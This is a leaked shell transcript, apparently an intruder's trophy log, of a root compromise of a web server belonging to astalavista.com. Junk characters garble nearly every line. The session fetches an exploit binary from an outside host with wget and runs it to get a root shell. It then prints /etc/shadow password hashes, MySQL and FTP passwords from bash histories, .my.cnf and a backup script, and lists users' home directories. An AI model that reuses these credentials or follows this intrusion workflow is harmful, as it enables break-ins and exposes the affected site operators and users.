2 \) n: X( v, o0 G5 }8 B: w9 ~# D5 {% m3 P
sh-3.2$ uname -a
, i8 c. [, G- O& y( Z( n) A0 qLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux" n+ {5 ?3 l$ Q: i# `+ x1 L
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]6 |$ M9 ~/ a' Z9 W6 [9 ^# B
–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]9 ]$ P2 x( [" k& q4 A4 l/ P: f
Resolving anti.sec.labs… 13.33.33.37" g6 l1 \9 o6 A, P. e2 i
Connecting to anti.sec.labs|13.33.33.37|:80… connected./ F/ f2 R7 h0 ^* x& S& V
HTTP request sent, awaiting response… 200 OK
6 b% D5 W9 ]' t) ~; `/ T6 C5 |) mLength: 18200 (18K) [text/plain]
/ e( U) N7 q1 P0 WSaving to: `g0troot’
3 P, f! k4 I3 @' l0 w  [
6 q# m7 T; r; R* n% s8 i100%[=========================================================================================================================================>] 18,200      58.6K/s   in
& o' R; o/ x4 e; u2 h0.3s$ i& H& l" X6 J' p
. H' Z0 m0 ?  Z% u  p6 ]
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
# Z3 y) `! _# r" f; N6 m
& W) Q* s/ f$ N) R8 lsh-3.2$ ./g0troot -i x86_64
4 j% x/ `# a$ ^7 q# ~: S; y" \& m[+] g0troot - anti.sec.labs
! Q4 i$ t. h* Y9 g3 \" l: J( h[+] Target: 2.6.18-128.1.10.el58 q1 O1 ?- Q1 r, {9 a! n
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]9 k% P1 n2 m3 P7 E

3 x- {0 ]4 D- e$ a[+] r00tr00t# w! J7 K6 N! Q, ]$ L! \
[~] Executing shell…! c: J/ h  [+ R* l1 Z1 e

9 K0 ^) S. N: fsh-3.2# id! m/ J8 [9 k) d. e7 k
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
& X4 f! w& n7 `' J4 M
1 D  j1 V& v1 L! Bsh-3.2# cat /etc/shadow
. d; @3 o; A7 k; mroot1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
; U, s" v" U% x! x$ S[snip]
- K- W% f, Y& {- J- iadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
" m: j, n" Q: I, K' m4 ?0 w# E. bjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
2 ~8 V) y2 Z5 J2 B3 u; ]( Y# \com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::4 _1 u, h9 A. X7 z
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::+ |# Y; x" ^) A. A' O! l# O' i
  W1 I/ r4 i7 @
sh-3.2# cat /etc/motd
! n+ y' [$ Z7 ?5 W; W' l#####################################################7 [2 l& m! f; d" w
#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
: ^: B: {2 Q: U$ q" h" F# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
7 e- X1 Y8 I# @' M/ z/ W9 B( n# J# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #- j. g, k. R( _0 f$ N! b. t; E
#                                                   #
8 |$ {# `% Q( I' F: ^7 l#####################################################
0 _$ \3 ^3 Y& q, ]7 f#                                                   #$ y5 E/ a* g4 o- M6 z
# Admin Contact - 链接标记support@secureservertech.com      #; X3 |# k/ F' k7 e0 a1 l6 \
#                                                   #  @. U$ [- b) a, m7 L1 q
# Available ShortCuts                               #
9 a' a; R, r, H; l/ ~2 c#                                                   #& \: L/ x& o; I* i' H) Y) Z
# nst -  list active connections                    #' B' R* _. c, c. I
# ddos - shows how many times each ip is connected  #2 Z/ t1 g/ _% r. H  {# B' [) @; U
# ltr -  restart the webserver                      #1 \( Y' t* ?  L% M& d
# phpc - edit the php config file                   #
, ], }4 Y, R; B- F, j+ C# htc -  edit the webserver configuration file      #
- V+ G" W. t2 E, f1 r* l# up -   uptime                                     #: i" m( o3 f9 O, D; d' p
# etd - edit the motd of the day file               #" W( L2 E% O/ _  _% B& |. I6 `  A
# htr - start and restart apache if needed          #
: D% u* S1 a: M- L( [- e# syng - shows active SYN_RECV connections          #
+ |7 n4 `" a3 S' C# synd - syn flood blocker - “synd -h” for usage    #
5 H! E8 ?( r$ ]/ w#####################################################
6 _/ \; W$ j7 O9 D& H# NOTES:                                            #
  H- C3 J# b& N7 H8 S# Last Upgrade - 12-08-2008 by JF                   #8 F8 t. D0 A" o* B5 y; h
# My.cnf/Mysql Optimization - 1-28-09               #
) R- v5 e+ L& |7 f6 V#                                                   #
5 @; F5 ~5 y- W: O9 Q#                                                   #
3 P1 r3 F. V$ @: ]4 x( k#                                                   #
- G4 ?- d+ y) Z) l3 M#####################################################
5 M4 D# a$ j6 l0 j+ |1 t6 [  e
& G, M9 s# }& C) T4 a4 s2 ?sh-3.2# lastlog | grep -v Never1 `: T0 Q: t9 Y
Username         Port     From             Latest. x$ t/ @2 d1 ?1 R$ ?$ U# p1 m4 g
root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 20093 F  M& m" v9 \+ Z1 _/ G* ]: G! M+ k% B
admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008  T* H& g# n1 `
com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
8 S: C/ P9 }9 A. @astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20094 ], P+ C( P7 r( F/ t  ~
4 d5 n; x6 O- Z3 R2 o
sh-3.2# ls -la
* j. b0 R+ [, H' S2 i1 Btotal 453376
) ]4 L& M$ B1 o/ ]$ w4 Adrwxr-x— 15 root root       4096 Jun  4 08:40 .
* ^/ T9 C* t( b* T# P& rdrwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
- w# ]. X  S5 U5 x9 U-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip
0 N8 {, z1 v9 @4 c# L+ @& S4 m6 ?-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg
6 {$ i. z( d6 @# c/ [& D: z-rw——-  1 root root      16836 Jun  4 07:21 .bash_history
* j7 e3 A+ a2 c8 T-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout
$ ^) J* `- F0 i5 d-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile7 }. i  W  K5 F7 l% n9 j  e3 T* \1 S& R
-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc
: k4 \7 J% [: n* \. Q; Q5 M-rwx——  1 root root       1899 Oct 28  2007 bk.sh5 w4 Q3 z0 u& Q& @. `
-rw-r–r–  1 root root       1327 Nov 29  2007 cert
* Q  f" J2 q; q6 b-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql
$ ~( N. l2 F2 e8 zdrwxr-xr-x  4 root root       4096 May 20  2008 .cpan
8 w/ ]# ~( j7 {: H. \-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc3 T& c& u, Y0 {2 |5 z5 K
-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql2 z7 g0 g# _  J3 a4 `
drwx——  2 root root       4096 Oct 28  2007 .elinks
0 U$ i, X' i4 g' Q7 [drwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1
5 M! v% P) @9 |-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz29 l7 h9 N& f8 \1 ?" L! M2 B8 D
-rw——-  1 root root          0 Apr 16 13:19 .history) P" w2 ?4 N1 F, r9 ], U9 e
-rw-r–r–  1 root root      16095 Sep 11  2007 install.log4 c' ^6 M0 P6 {# y3 j9 P0 [
-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog! H# r3 ?0 ~' a- X% u1 D! L2 _
-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh
" P/ V/ H; A* T$ [6 O-rw——-  1 root root         35 Jun  2 14:23 .lesshst
& Y3 d  r/ C& q& u# I. {; w. v# Jdrwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp
1 e0 ^3 c, |% r" G2 L% v. rdrwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec0 Y  h( ~9 Z1 U  f! F
-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz9 I" Y+ l- O, |0 o& o
-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2+ g! _( N3 s. P  f4 T1 }  z
-rwx——  1 root root        760 Sep 18  2008 lp* j/ d1 f1 L9 p* m- u6 f* B5 g. f
drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1
7 C: i2 C5 r$ _  O- x* I0 {7 }-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz5 S) K; m! n$ G$ _
-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
3 G" Z1 Q- F  e5 b$ {% B& @2 B# Jdrwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9. x- A3 j% Q5 |" x) o+ L
-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz1 w- z" {# [  X5 h# N& ^7 @
drwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3& w8 b9 L( ?8 f6 K
-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz* @- {% d. a5 e- j4 o
-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh6 z7 G( c* _- ]  D. Z8 Y6 a) G
-rw——-  1 root root         41 Oct 19  2007 .my.cnf8 n+ ~4 d) h7 Y5 h  v
-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history
( t2 ?4 d% u4 q-rwx——  1 root root      38873 Apr 16  2008 mysqlreport, n2 s  A( [9 f* R+ O1 ^
-rw——-  1 root root         41 May 20  2008 .mytop
# l4 x0 T3 e8 V8 ^; W- n) |1 udrwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6
; I: @& v. z/ l) f! Z. b2 F+ a-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
7 _- `5 `. e8 k5 }6 qdrwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp; G' c9 \, d; L9 ~+ @/ r( u) q  x
-rw——-  1 root root       1462 Sep 21  2007 opt.php" P" S+ ~1 s8 X
-rw-r–r–  1 root root       3371 Sep 22  2007 p" x' u8 R4 T( e4 G0 W7 b1 s
-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2
% c% ^, h1 G. h2 E$ J7 g-rw——-  1 root root       1024 Feb  3 21:32 .rnd# {, Z& `8 G5 L6 Q2 X  ^. [/ Z# k
-rw-r–r–  1 root root        716 Nov 28  2007 server.csr
& a5 F) P2 [; g4 O1 a-rw-r–r–  1 root root        887 Nov 28  2007 server.key
  G/ q$ Y2 i% {: a8 F# ^; Kdrwx——  2 root root       4096 Oct 10  2008 .ssh: M( W7 u; q; @+ I2 c; g0 K  o
-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat+ ]% Y. ]8 h6 _& H3 M" @
-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc% V) \+ c, R8 K( U! P: ^% }3 ^
-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip, N% u* g6 o' u4 s; ?: P
-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.1  a; z, h/ v) T7 g/ q8 ^- \1 I
drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
) }" u; r& h8 f2 ?2 ]$ j-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh
) h4 u! N2 t( x& Zdrwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.07 E( J0 ?2 H) x; f9 c& S
-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
- w, s" w- @2 [-rw——-  1 root root      12997 May 16  2008 .viminfo1 v2 G  r+ [  b* \- ^5 J

* l1 D( X0 v3 Q3 `9 Q" U( }sh-3.2# cat .bash_history1 x0 w( ~1 P2 }- w- H, [5 w
[snip]
0 v" `6 Z# F& @/ E/ Ewget cp4sst.com/sstlinux.tar.gz" x3 q+ O& N% o
tar zxvf sstlinux.tar.gz6 {: u2 c- C' z% g& A% p. b3 u
cd linux-2.6.27.10
# @1 J+ m2 s$ @7 Gsh install.sh
2 J6 i4 F* o/ r3 r! I' v% nmake bzImage ; make modules ; make modules_install ; make install5 f- P7 |$ g. U* w) s
make clean
+ d; m6 v% a: Z9 V/ Cservice mysqld restart
2 A/ t# K; L4 T7 L; e/ V  z. h[snip]+ K7 c; ?/ ~" W# B/ R
cd /usr/sbin/1 q* Y  \. ]( q
chmod 4777 traceroute8 h( t, m+ E5 f8 J, T5 R
chmod 4777 ping7 [6 H4 j$ l3 a8 p- Q6 f
traceroute -I 链接标记[url]www.astalavista.ch[/url]
2 k* ]5 p$ A8 U7 o: l7 k, w, L[snip]3 s& P9 V1 l/ E' F
vi /etc/csf/csf.conf
$ w. a2 _' s# s, C# h) Q8 mtraceroute google.ch
, l8 X: D, k/ K# F% {" q: Bservice csf restart4 t  R/ I  ]2 l
tracert google.ch( m2 f1 `1 J+ W6 m& N4 V4 F9 H
service csf restart+ }+ e4 Y+ u2 o+ l7 i  R5 O
traceroute 链接标记[url]www.google.ch[/url]$ ]0 m: e4 K) r4 P4 i; f3 i& D
tracert 链接标记[url]www.google.ch[/url]
) q7 g$ X2 e+ I8 itraceroute 链接标记[url]www.google.ch[/url]
- Z& P: G# k. F6 O5 k$ Hlocate traceroute; B% N8 K) Y% z0 `% Z; F( a* @% u
chown 4755 /bin/traceroute
7 @7 ~2 B! U, ~: p* q# S% f# o0 R! Zchown 4777 /bin/traceroute
  ?: j$ n" z6 glocate ping# Y& @) v1 |2 v5 d% |" C5 i; c
chown 4755 /bin/ping
& ]; ?2 Z$ V$ Z% \, h# zchown 4777 /bin/ping
3 C" X# K: t, Z& P, F* J( Z4 |cd /bin/
2 O# }* v" V, S& q! N. yls -ali | grep ping
8 y$ v. Q5 ~% u; o5 Ychown root ping
1 P) }6 G0 z% Q, v3 _chmod 4755 ping/ x2 w+ B2 R: H
ls -ali | grep traceroute
* ?/ e7 M/ D$ echown root traceroute- V4 J; }/ u  x* Z- o( M
chmod 4755 traceroute1 `: l: p5 v6 M1 t
ls -ali | grep traceroute
# E! o# C! A# d% p: Ptraceroute -I 链接标记[url]www.google.ch[/url]
0 a: C" E3 k% s, n5 u4 ?traceroute 链接标记[url]www.google.ch[/url]6 f8 {1 n- L5 \0 B3 w1 _
whois pmsantos.ch; D0 x5 @  O+ J9 {6 R, Z- L/ g  J
[snip]) m+ V8 P' B) m$ @0 K6 _
mysql -h com_contrexx2_live < /root/defaultp_ports.sql' K, n; @& b" `* C5 C: V% I
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
: V6 T- }; G2 l. |( P0 L: gmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
* [! T2 n. H- i+ }; j9 T5 Mmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql6 W! t6 b0 M( d6 u
top
1 T4 R/ x; i6 F3 @! Wping ssth.ch+ T$ M4 t# B: C& w* E: s$ i
ping asdlkfaljgasd???ljg???lasj.ch9 Y& Z" e/ t) B" v! A+ D' Q; I
ping asdlkfaljgasdlasj.ch
/ P* I6 ?; t' [; m* Eping 链接标记[url]www.ssth.ch[/url]
2 \7 k6 J  u) p/ \+ n$ p1 _' Eping ssth.ch# X& i6 T; u# A6 @! F3 A& G
nslookup 链接标记[url]www.google.ch[/url]+ }( b" e* `' Z
nslookup 链接标记[url]www.ssth.ch[/url]
4 d  K; I  v7 Mman nslookup9 E, @) j7 O7 Q/ T5 S/ Y- _% ^
ping 链接标记[url]www.google.ch[/url]
+ E. Z/ x! P6 e; o7 i9 i+ \8 Pnslookup 链接标记[url]www.google.ch[/url]
! h3 i8 U: }; A& y! v( Wnslookup 链接标记[url]www.google.ch[/url]3 t) V" p4 j! j  n
nslookup salfjasdlf.ch
9 `3 Z, P6 i, I; r; `[snip]7 U$ }" N, A9 ~6 U5 e2 q
openssl passwd -1 sadf
) I2 H. K3 F% O+ }# vopenssl passwd -1 5cZNHstdTy: U* o3 `( Z; x& Z# s( v
mysql+ [5 e- W1 ^: j; o! T
mysql2 ]2 m' h' u- ?  T4 R
locate proftp5 o5 t% z7 |. d5 Y
vi /etc/proftpd.passwd4 S& g; g( K) k# d+ ]9 h
service proftpd restart: ?) s8 [( C- f2 P  U% D
locate proftpd.conf
5 T- t/ ]/ x: X4 [+ qvi /etc/proftpd.conf
' e2 p0 L- l/ z& ^7 o: v3 svi /etc/proftpd.passwd
) A" m( E7 O, g. `9 Zservice proftpd restart
9 W# s/ s$ l7 ?" G9 m7 D[snip]
. q, N* r( n+ R" [) b/bin/sh /home/com/backup_system/backup.sh5 ~7 B  C  Y6 F, M9 Q
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin/ N8 D$ ]& \$ m+ N6 A# ]
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
( @% E3 K1 H9 O4 A+ \mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql* I1 w4 b/ B3 e  N: W
ls -ali
# H8 h4 c; Q, n- O, u* [* J( {- Amysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
) H) T" G! e3 T5 @mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql3 ~# M! ~9 y; v8 P! ?& G+ w: g
crontab -l: M- w7 a" z1 k5 ~
crontab -l0 @" Z2 f$ j  C' _. z" x1 K- R( q
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
9 f& ^% Y  q2 m/home/com/public_html/modifications/cronjobs/exploits.sh
& u0 N% c2 @/ u5 G8 a; V) P; Jwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
; v$ {, {- F; ~) Ptar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
* _7 |  Q, w% C! \cd lsws-4.0.3
3 c8 I+ Y2 V. x$ R, V% nsh install.sh
3 n) h9 e, ?) _5 D8 x$ z6 W" Huptime5 f) j4 d& z& M9 [( n* b% v) f0 f
hdparm -tt /dev/sda5 P: Q& U+ f' h0 J/ @
iostat
1 G( i) N" M0 I8 ?& p1 Uyum install iostat
4 o! v+ k9 r8 n. J( m0 ]iostat3 u; S2 X; l3 _$ E/ [8 X4 t4 t/ U+ U
whereis iostat! `3 R% X6 U. h
yjm clean all" ~( {# U$ t9 J$ [3 r3 I2 |3 U
yum clean all ; yum -y update
; V0 F3 f/ a# D+ j3 I9 N4 t  yiostat
3 r  l8 ]2 O7 T5 Zyum install systat/ ^8 _2 H' E1 }7 z+ _0 x6 N
rpm -qa | grep iostat6 R: @7 H- X  o5 |$ s
rpm -qa | grep sysstat; K) [2 A9 C. K3 q: Y' a  ^
rpm -qa | grep systat( O% ]* i) O/ ?9 H- a
dmesg -c2 b6 k7 J( x' _
sysctl -p
! z/ h1 L# G3 y1 o$ j' huname -r& Z6 S, k+ \  I! I: N8 k
cd /usr/src
" U9 Z! P. U$ m1 `4 \wget nix101.com/kernels/sstlinux.tar.gz  M6 a. Z0 d+ T2 j/ W/ O: x
shutdown -r now2 w' D0 A+ b; _6 @, R9 j
nano -w /boot/grub/grub.conf! p" {# V. L9 i# J2 M

8 j- T: |% }' m7 {+ M  z9 ish-3.2# cat .my.cnf& O- t( G9 z6 _5 C% ]. H% Y
[client]
: K9 w) ]* V$ j( k0 L& euser=da_admin. k$ F; z) S- _7 y2 Z8 Y
password=X9dctmRH
+ ?2 F! S0 e9 \- Q8 X; y: \
: D  x+ r+ ?$ P! J# ]& c4 csh-3.2# cat /home/com/backup_system/backup.sh, M% C# X7 l% S" U% P4 K/ G1 u
#!/bin/sh
# F5 I* R# F* B6 v9 P#####################################################################% W. `( _! T3 h# O4 h
#                                                                   #
8 @, K0 U; _: K4 p#   incremental backup for astalavista.com                          #9 B! n6 ~! R9 k, L5 M, N" C  e: \
#                                                                   #
! U- r8 d" i% |- t1 \8 \, d#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #* m- d# {4 K  e. R. W; B
#                                                                   #5 w+ E" [5 O" e) \) O
#####################################################################, E. O! p% g2 r+ H' h3 W3 P  o
[snip]
# n' Q, \/ ^% H! o4 yPROG_DIR=”/home/com/backup_system”;5 {& p4 ]# ?  I8 o1 b' v& y/ U2 y( Q
BACKUP_DIR=”/home/com/backups”;
9 J0 z8 k6 P. z& A2 ODOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
% P# |* Y. ?0 g6 n# ftp for synology backup server
- C8 |! T# L6 B7 K( i, S/ YFTP_HOST=”212.254.194.163″;; o( U. y& W0 K6 D6 `6 }
FTP_PORT=”21″;& a& }+ h: ^5 c
FTP_USER=”astalavista.com”;
/ O: g( g  \; o+ l; n2 h  o  ]FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
# x7 s# _# H) j! y; l$ C* b- w* y4 MFTP_DIR=”/astalavista.com”;" H. U$ ^, r  |, A
# database, x# M0 k6 m" f( `3 n. o, E
DB_HOST=”localhost”;; a  r( v" _' P: D; P
DB_USER=”contrexxuser2″;" y- ~. P1 _1 w$ W6 q8 W
DB_PASS=”0fEYNZgXz1pKe”;
  E- b% D8 |6 _5 j8 `DB_DATABASE1=”com_contrexx2_live”;
  a" @8 Q& R. n9 R8 sDB_DATABASE2=”com_contrexx2″;
* i8 p! w9 [% M+ m# E2 Y/ f$ J# }7 E[snip]
- W9 h4 f" a" s. D& j: m: z$ \ftp -in $FTP_HOST $FTP_PORT <<EOF
! `8 B4 c5 p2 ?9 c* F9 ~quote USER $FTP_USER( [. `& m, `* s+ G) A# e* v1 Y, U
quote PASS $FTP_PASS
" s+ I$ a: z( l- Mcd $FTP_DIR
3 ?, U" G) b$ m4 P) @put $DB_FULLNAME-SQL_Dump.tar! R4 x; \5 I0 N- N  M" R. f
put $BACKUP_FULLNAME-Public_HTML.tar
4 x$ d8 I2 {% |0 B# e! y/ Wclose9 v8 V3 o# {: F* m
bye5 _& ]2 l5 `2 j! j8 l
EOF
* }( N& P) J- Q' W# P) T: t  Q
7 z/ \% k: j6 P( d0 V% xsh-3.2# cd /home  R2 ^, P/ B/ R$ A1 B: Y
sh-3.2# ls -la  E1 D+ W0 v/ y
total 120: ]! T8 N& V# X1 r/ S
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .5 J" R# h4 R6 M  a: B( \
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..5 R+ v8 F, X, l' q  p
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
* {  a' c' c  u+ H* L7 t-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group* t- u6 P  w4 x" z' ]& p
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
  a2 H2 \! m% E3 k$ wdrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
* ~$ k6 c$ S, ]: F' wdrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
& V1 @: h( v' n! j) e- w5 y3 hdrwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161' r1 E% n% Z: Y  q8 i0 A+ K3 W
drwx–x–x 10 com     com      4096 Apr 28 12:40 com, [) B( T9 C; M$ G
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
. a! h" z* n: I( H. c2 q; X% ]3 xdrwx——  3 jon     jon      4096 Sep 21  2007 jon
! x4 |- k: K. U! `( j$ D& Adrwx——  2 root    root    16384 Sep 11  2007 lost+found
# u( ]/ _  {; o* \drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
4 m3 G! X  v& Tdrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
6 Y2 I' @0 {  j) O& ?drwx——  2 jon     jon      4096 Sep 15  2007 test2 ^! M; z, u% _9 U
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
2 A+ A$ E% l2 G" {" H$ k' Z9 B' N, A/ ]) Y2 V1 E. H) D
sh-3.2# cd admin6 @6 k3 H. [. {5 x
sh-3.2# ls -la
1 O3 j! ~3 n9 X6 atotal 1735896; U3 z4 j0 N) g! _/ x7 ?
drwx–x–x  9 admin admin       4096 Nov 28  2007 .7 T. L$ J/ a$ n; Z5 N  G4 _
drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..* a& r3 z* B, S, R1 D
drwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups! _* L, c3 e( k* J: Q1 b0 }
drwx——  2 admin admin       4096 Sep 28  2007 backups
4 B/ ^, k# D; v: \' f-rw——-  1 admin admin        860 Sep 17  2008 .bash_history; _! S, d5 Z4 K" q: p3 x
-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout4 b2 K8 w6 E2 G+ Z) z" g
-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile
/ _2 f- e  O4 m) y! L-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc$ }. G! [( F. q! q9 X
drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups
8 X4 U/ T; ]$ o; R' D" M' J6 @% Mdrwx–x–x  6 admin admin       4096 Sep 21  2007 domains
" H# R% n" c0 u- H& Mdrwxrwx—  3 admin mail        4096 Sep 21  2007 imap  A5 ^! A3 c3 K' @+ `) A
-rw-r–r–  1 root  root          24 Sep 21  2007 info.php
+ f) P2 N  o- t3 {3 m: ldrwx——  2 admin admin       4096 Sep 21  2007 mail; B. C) Y( z3 b
-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr
+ N, V7 D, c& u. b+ s7 x-rw-r–r–  1 root  root         887 Nov 28  2007 server.key
& i' ?2 B$ l5 j) q% l-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow! f8 A% K. t) g8 _
-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz# T) L! t* t' x6 {( a" \: F
drwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups# M0 E0 N* {- `* I

# \3 }4 |! [& {" Fsh-3.2# ..7 G1 ?! @3 e; S" |; p
sh-3.2# cd jon+ D* C2 g% F; S" q- M
sh-3.2# ls -la5 u/ A% Y4 \/ ?2 C$ i' l5 x+ N/ d, H
total 36
! e; {* R* @' Z( r& Xdrwx——  3 jon  jon  4096 Sep 21  2007 .
* r1 T5 I; U' [  d; g9 kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ Q3 f. A+ x" B1 U& ~- X% [-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history4 G3 `" \8 l& H. W! k% G7 c
-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout; d3 J6 W7 e& l, q
-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile) B1 J6 }+ i4 {
-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc
. g! X( n! ^) L% {# D-rw-r–r–  1 root root   24 Sep 21  2007 info.php
8 k7 ?, z  m; ]+ P  Odrwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html
; R; I, S  E3 Y+ D0 k) {0 `' j7 a+ {5 D! V: N3 Q" n
sh-3.2# cd ..; f4 {( b* J" H2 s) x, |$ B9 G
sh-3.2# cd test
9 P- W1 Z+ c2 L0 @0 |2 g, i& `9 Msh-3.2# ls -la# F9 L' s5 [) h' u8 ]) |- x
total 48! L5 A9 x0 O: T' N) R
drwx——  2 jon  jon  4096 Sep 15  2007 .. V/ F- E- _* _1 g4 Z& U' h
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
& A; T2 U. r3 h-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history
: S3 t5 E4 m4 P0 x! j' j-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout) G2 v0 V$ j- ?; U$ L
-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile
$ b. d3 D9 o: F-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc
2 x# E1 F% t7 U3 W" @sh-3.2# cat .bash_history
# U7 Q; A# A& u0 R. a/usr/bin/mysqladmin -u root password PoliuJhytg67
' w0 u6 N% |5 L4 U9 i: s% g) u, T2 v7 E
sh-3.2# cd ..
/ b; q7 H$ }) K8 q) x/ c1 @sh-3.2# cd astanet
! F5 T8 l: I; m3 Ish-3.2# ls -la
6 ?* C2 P8 B# e1 h- itotal 52
, \3 E- o; n8 {. ~0 a: Ydrwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .
5 S) F0 s9 t9 M! h1 T' N/ b# sdrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..: Y' ]1 k0 N0 C5 Q, m
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
6 p$ S" w; b4 f+ I/ T) [# \$ E-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
